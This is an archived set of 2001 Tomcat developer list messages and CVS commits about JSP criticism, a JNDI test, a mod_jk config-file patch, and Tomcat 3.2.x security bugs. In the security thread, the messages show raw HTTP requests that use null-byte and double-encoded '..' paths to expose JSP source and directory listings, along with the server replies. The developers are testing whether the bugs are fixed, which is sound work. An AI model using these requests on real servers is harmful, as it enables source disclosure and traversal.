[EMAIL PROTECTED] __ Do You Yahoo!? Get email at your own domain with Yahoo! Mail. http://personal.mail.yahoo.com/
Re: Just say no to JSP Re: [Fwd: Tomcat may reveal scriptsource code by URL trickery]
At 11:24 AM -0700 04/04/2001, Jon Stevens wrote: I love the article title: "Just say no to JSP" Glad that change made it in. DDJ wanted "Just say no to HTML". Arggh. I'm so happy to see that more and more people are waking up to the fact that JSP is bad. I'm also happy to see you worry about form validation issues. That is a problem that we are currently solving in Turbine right now. It is called "Intake". :-) I'll try to make some time to check that out. It is sad to me that you: #0. Apache/JServe. Can't spell the product name correctly even though it has been around for 4+ years. :-) Sigh. Yet another typo. I really thought we'd caught them all. #1. Confused "Turbine" with "add programming language features to HTML". #2. Confused "WebMacro" and thus Velocity with "add programming language features to HTML". If you spend time with the products, you would see that isn't the case and you might actually retract your statements. You've touched a nerve here. This is the amount of time that gets consumed installing web based infrastructures. Maybe Turbine is an exception and I certainly hope so. I'll pick on Tomcat here because the wounds are still fresh from spending a whole week on what should be a trivial task; porting a running webapp from a deployment server running Linux 6.2 to the server from hell; a hacked "virtual" implementation of FreeBSD at HostPro.com. I should point out at the outset that this isn't to assign blame but to point out a problem... namely, the complexity that developers must deal with to get a working infrastructure in place. My application uses Apache, JServ, Java, and the servlet engine from Tomcat. Period. No taglibs, no JSP, no XML, nothing. Yet it took a whole week to get even this on the air, even though I've been through the tomcat configuration process dozens of time by now and had working config files to start with. Much of the problem was expecting the user (me) to translate exception backtraces into what should be done to correct the error. The first problem I hit was a NullPointerException while reading request parameters. Why? I've no idea. An unfamilar JRE was preinstalled so guessing, I installed plain ol' JDK1.1.7 and that seemed to fix it. Next problem was various JServ failures, none clearly explained by the errors, and none explaining what what was wrong and how to correct it in the config files. Then most of the week worrying about why Tomcat wasn't recognizing my servlet context. I've a bunch of ideas for partial solutions but I'll hold off on those to see whether there's any agreement that there's a problem here. I have more comments, but no time right now and this probably isn't the right forum anyway... I'd be grateful to hear them when you get a moment. -- --- Brad Cox, Ph.D.; [EMAIL PROTECTED] Phone: 703 361 4751 Cell: 703 919-9623 http://superdistributed.com: A new paradigm for a new millinneum
Re: Just say no to JSP Re: [Fwd: Tomcat may reveal script source code by URL trickery]
An alternative view! On 4 Apr, Brad Cox wrote: At 11:24 AM -0700 04/04/2001, Jon Stevens wrote: I love the article title: "Just say no to JSP" I am really sorry to see folks coming on this list, and also publishing to the general web articles deriding JSP and tomcat in particular. I have apache-1.3.19 with tomcat-3.2.2b running behind it just fine using mod_jk. The application running is an apache soap server This is on a redhat 6.2 box. I also have tomcat-4.0 running on port 7070 at the same time where I am doing development on a secure email application. I have moved my email app back and forth between TC3.2 and TC4.0 with no problems. I just drop the war file in the webapps directory and tomcat does the rest. I do have all the latest jar files from SUNW, and jakarta-apache. So I don't know what the problems could be. My only complaints would be not enough debug tools around to be able to single step through new code when you are having problems, but I consider that minor at this point, given where the tomcat development cycle is. I think the tomcat developers for all their good work. =eas= -- . |\ | \ | \ | -\ |\ | * \ +---+ | \| I'd Rather Be Sailing A Laser | | --\ +---+ | 83345 \ | \ | ---\ | \ |\[EMAIL PROTECTED] |-O---\ |/w\-| ..|=| \ I| | ~~~
cvs commit: jakarta-tomcat-4.0/tester/web/WEB-INF web.xml
remm01/04/04 17:06:32
Modified:tester/src/tester/org/apache/tester Jndi01.java
tester/web/WEB-INF web.xml
Log:
- Add test for bug 1202.
Revision ChangesPath
1.2 +12 -1
jakarta-tomcat-4.0/tester/src/tester/org/apache/tester/Jndi01.java
Index: Jndi01.java
===
RCS file:
/home/cvs/jakarta-tomcat-4.0/tester/src/tester/org/apache/tester/Jndi01.java,v
retrieving revision 1.1
retrieving revision 1.2
diff -u -r1.1 -r1.2
--- Jndi01.java 2001/02/22 01:07:26 1.1
+++ Jndi01.java 2001/04/05 00:06:31 1.2
@@ -74,10 +74,21 @@
* should succeed.
*
* @author Craig R. McClanahan
- * @version $Revision: 1.1 $ $Date: 2001/02/22 01:07:26 $
+ * @version $Revision: 1.2 $ $Date: 2001/04/05 00:06:31 $
*/
public class Jndi01 extends HttpServlet {
+
+public void init() throws ServletException {
+Context ctx = null;
+try {
+ctx = new InitialContext();
+log("initialized successfully");
+} catch (NamingException e) {
+log("Cannot create context", e);
+throw new ServletException(e);
+}
+}
public void doGet(HttpServletRequest request, HttpServletResponse response)
throws IOException, ServletException {
1.18 +1 -0 jakarta-tomcat-4.0/tester/web/WEB-INF/web.xml
Index: web.xml
===
RCS file: /home/cvs/jakarta-tomcat-4.0/tester/web/WEB-INF/web.xml,v
retrieving revision 1.17
retrieving revision 1.18
diff -u -r1.17 -r1.18
--- web.xml 2001/03/30 21:20:04 1.17
+++ web.xml 2001/04/05 00:06:32 1.18
@@ -300,6 +300,7 @@
servlet
servlet-nameJndi01/servlet-name
servlet-classorg.apache.tester.Jndi01/servlet-class
+load-on-startup1/load-on-startup
/servlet
servlet
cvs commit: jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup Catalina.java
remm01/04/04 17:08:47
Modified:catalina/src/share/org/apache/catalina/startup Catalina.java
Log:
- Don't set an initial context factory.
Revision ChangesPath
1.18 +4 -6
jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java
Index: Catalina.java
===
RCS file:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java,v
retrieving revision 1.17
retrieving revision 1.18
diff -u -r1.17 -r1.18
--- Catalina.java 2001/03/15 05:34:56 1.17
+++ Catalina.java 2001/04/05 00:08:47 1.18
@@ -1,7 +1,7 @@
/*
- * $Header:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java,v
1.17 2001/03/15 05:34:56 remm Exp $
- * $Revision: 1.17 $
- * $Date: 2001/03/15 05:34:56 $
+ * $Header:
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/startup/Catalina.java,v
1.18 2001/04/05 00:08:47 remm Exp $
+ * $Revision: 1.18 $
+ * $Date: 2001/04/05 00:08:47 $
*
*
*
@@ -97,7 +97,7 @@
* /u
*
* @author Craig R. McClanahan
- * @version $Revision: 1.17 $ $Date: 2001/03/15 05:34:56 $
+ * @version $Revision: 1.18 $ $Date: 2001/04/05 00:08:47 $
*/
public class Catalina {
@@ -676,8 +676,6 @@
value = value + ":" + oldValue;
}
System.setProperty(javax.naming.Context.URL_PKG_PREFIXES, value);
-System.setProperty(javax.naming.Context.INITIAL_CONTEXT_FACTORY,
- "org.apache.naming.java.javaURLContextFactory");
}
// If a SecurityManager is being used, set properties for
Better instructions for getting JSSE/JMX?
Hi, I've been trying for the last half-hour to get JSSE and JMX to build Tomcat 4.0. Could someone provide instructions for traversing the password-protected recursive mess that is the Sun site? I've progressed through these pages: http://java.sun.com/products/jsse/ http://jsecom9a.sun.com/ECom/docs/SignOn.jsp?LMLoadBalanced=LMLoadBalanced= http://jsecom9a.sun.com/servlet/EComActionServlet/ECom.WelcomePageInfo Where I get to this page: " To get more information about a product, select the product from the list below: Insight Services Solaris 8 StarOffice Sun GridEngine " None of these have ANY relation to getting JSSE! So I try the "Download centre" link: http://www.sun.com/software/shop/index.html Which leads right back to the original page, http://java.sun.com/products/jsse/ AAARGGHHH.. --Jeff
[PATCH] For mod_jk.c (tomcat_3.2.2)
Attached is a patch for mod_jk.c to more cleanly handle a bad path for the workers.properties file. Currently, this is handled in jk_init and if the call to map_read_properties fails, then we just call jk_error_exit which in turn calls exit(1). This causes some problems on NetWare because we don't go through all of the Apache cleanup code and so we can't restart Apache. The attached patch just places a stat call in jk_set_wroker_file to test for the workers.properties file. Since this is called during the configuration file parse, the error is reported earlier and allows Apache the shutdown cleanly. I've built and tested this for NetWare, Linux, and Windows. Mike Anderson Senior Software Engineer Platform Services Group [EMAIL PROTECTED] Novell, Inc., the leading provider of Net services software www.novell.com Index: mod_jk.c === RCS file: /home/cvspublic/jakarta-tomcat/src/native/apache1.3/Attic/mod_jk.c,v retrieving revision 1.7.2.3 diff -u -r1.7.2.3 mod_jk.c --- mod_jk.c2001/02/17 05:24:00 1.7.2.3 +++ mod_jk.c2001/04/04 22:18:23 @@ -477,8 +477,11 @@ server_rec *s = cmd-server; jk_server_conf_t *conf = (jk_server_conf_t *)ap_get_module_config(s-module_config, jk_module); +struct stat statbuf; conf-worker_file = worker_file; +if (stat(worker_file, statbuf) == -1) +return "Can't find the workers file specified"; return NULL; }
RE: TC3.2.x and security problems
OK, I just tried this again (my results included inline) and in all cases I get a 404 error. I'm using Win2000 and JDK1.2.2. I'll try testing with JDK1.3 on Win2000 tomorrow and see if the problem follows the JDK version of the operating system. -Original Message- From: Stephan Seyboth [mailto:[EMAIL PROTECTED]] Sent: Wednesday, April 04, 2001 9:08 AM To: [EMAIL PROTECTED] Subject: Re: TC3.2.x and security problems [...] $ telnet localhost 8080 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /examples/jsp/num/numguess.jsp HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1237 Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [numguess.jsp source follows] This one has been fixed in 3.2.2. $ telnet localhost 8180 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /examples/jsp/num/numguess.jsp%00 HTTP/1.0 200 OK Content-Type: text/plain Content-Length: 1237 Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [numguess.jsp source follows] My results on Win2000 with JDK1.2.2 GET /examples/jsp/num/numguess.jsp%00 HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 213 Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.2.2 ; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.) headtitleNot Found (404)/title/head bodyh1Not Found (404)/h1 bOriginal request:/b /examples/jsp/num/numguess.jsp%00brbr bNot found request:/b /examples/jsp/num/numguess.jsp%00/body $ telnet localhost 8180 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /%252e%252e/%252e%252e/%00.jsp HTTP/1.0 200 OK Content-Type: text/html;charset=ISO-8859-1 Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.) [directory listing follows] My results on Win2000 with JDK1.2.2. GET /%252e%252e/%252e%252e/%00.jsp HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 207 Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.2.2 ; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.) headtitleNot Found (404)/title/head bodyh1Not Found (404)/h1 bOriginal request:/b /%252e%252e/%252e%252e/%00.jspbrbr bNot found request:/b /%252e%252e/%252e%252e/%00.jsp/body I don't have JDK 1.3 on this machine so I'll have to wait until tomorrow to see if the problem behavior follows the JDK version or the operating system.
Re: 'Just say no to JSP' Re: [Fwd: Tomcat may reveal script source code by URL trickery]
Read Jon's article about the problems of JSP. http://jakarta.apache.org/velocity/ymtd/ymtd.html I read it and it made me rethink a lot of assumptions I had made about JSP. An alternative view! On 4 Apr, Brad Cox wrote: At 11:24 AM -0700 04/04/2001, Jon Stevens wrote: I love the article title: "Just say no to JSP" I am really sorry to see folks coming on this list, and also publishing to the general web articles deriding JSP and tomcat in particular. I have apache-1.3.19 with tomcat-3.2.2b running behind it just fine using mod_jk. The application running is an apache soap server This is on a redhat 6.2 box. I also have tomcat-4.0 running on port 7070 at the same time where I am doing development on a secure email application. I have moved my email app back and forth between TC3.2 and TC4.0 with no problems. I just drop the war file in the webapps directory and tomcat does the rest. I do have all the latest jar files from SUNW, and jakarta-apache. So I don't know what the problems could be. My only complaints would be not enough debug tools around to be able to single step through new code when you are having problems, but I consider that minor at this point, given where the tomcat development cycle is. I think the tomcat developers for all their good work. =eas= -- . | | | | - | | * +---+ | | I'd Rather Be Sailing A Laser | | -- +---+ | 83345 | | --- | |[EMAIL PROTECTED] |-O--- |/w-| ..|=| I| | ~~~ -- Nick Bauman Software Developer 3023 Lynn #22 Minneapolis, MN 55416 Mobile Phone: (612) 810-7406
cvs commit: jakarta-tomcat/src/native/mod_jk/apache2.0 mod_jk.c
hgomez 01/04/04 22:27:53
Modified:src/native/mod_jk/apache1.3 mod_jk.c
src/native/mod_jk/apache2.0 mod_jk.c
Log:
Clean handle of bad path to workers.properties file.
Fix cleanup problem on Netware
Submitted by: Mike Anderson
Revision ChangesPath
1.8 +5 -0 jakarta-tomcat/src/native/mod_jk/apache1.3/mod_jk.c
Index: mod_jk.c
===
RCS file: /home/cvs/jakarta-tomcat/src/native/mod_jk/apache1.3/mod_jk.c,v
retrieving revision 1.7
retrieving revision 1.8
diff -u -r1.7 -r1.8
--- mod_jk.c 2001/03/27 22:01:18 1.7
+++ mod_jk.c 2001/04/05 05:27:52 1.8
@@ -580,10 +580,15 @@
char *worker_file)
{
server_rec *s = cmd-server;
+struct stat statbuf;
+
jk_server_conf_t *conf =
(jk_server_conf_t *)ap_get_module_config(s-module_config, jk_module);
conf-worker_file = worker_file;
+
+if (stat(worker_file, statbuf) == -1)
+return "Can't find the workers file specified";
return NULL;
}
1.12 +5 -0 jakarta-tomcat/src/native/mod_jk/apache2.0/mod_jk.c
Index: mod_jk.c
===
RCS file: /home/cvs/jakarta-tomcat/src/native/mod_jk/apache2.0/mod_jk.c,v
retrieving revision 1.11
retrieving revision 1.12
diff -u -r1.11 -r1.12
--- mod_jk.c 2001/04/02 08:26:25 1.11
+++ mod_jk.c 2001/04/05 05:27:53 1.12
@@ -450,10 +450,15 @@
char *worker_file)
{
server_rec *s = cmd-server;
+struct stat statbuf;
+
jk_server_conf_t *conf =
(jk_server_conf_t *)ap_get_module_config(s-module_config, jk_module);
conf-worker_file = worker_file;
+
+if (stat(worker_file, statbuf) == -1)
+return "Can't find the workers file specified";
return NULL;
}
RE: [PATCH] For mod_jk.c (tomcat_3.2.2)
Attached is a patch for mod_jk.c to more cleanly handle a bad path for the workers.properties file. Currently, this is handled in jk_init and if the call to map_read_properties fails, then we just call jk_error_exit which in turn calls exit(1). This causes some problems on NetWare because we don't go through all of the Apache cleanup code and so we can't restart Apache. The attached patch just places a stat call in jk_set_wroker_file to test for the workers.properties file. Since this is called during the configuration file parse, the error is reported earlier and allows Apache the shutdown cleanly. I've built and tested this for NetWare, Linux, and Windows. Commited to Tomcat 3.3 branch for apache 1.3 and 2.0 Thanks
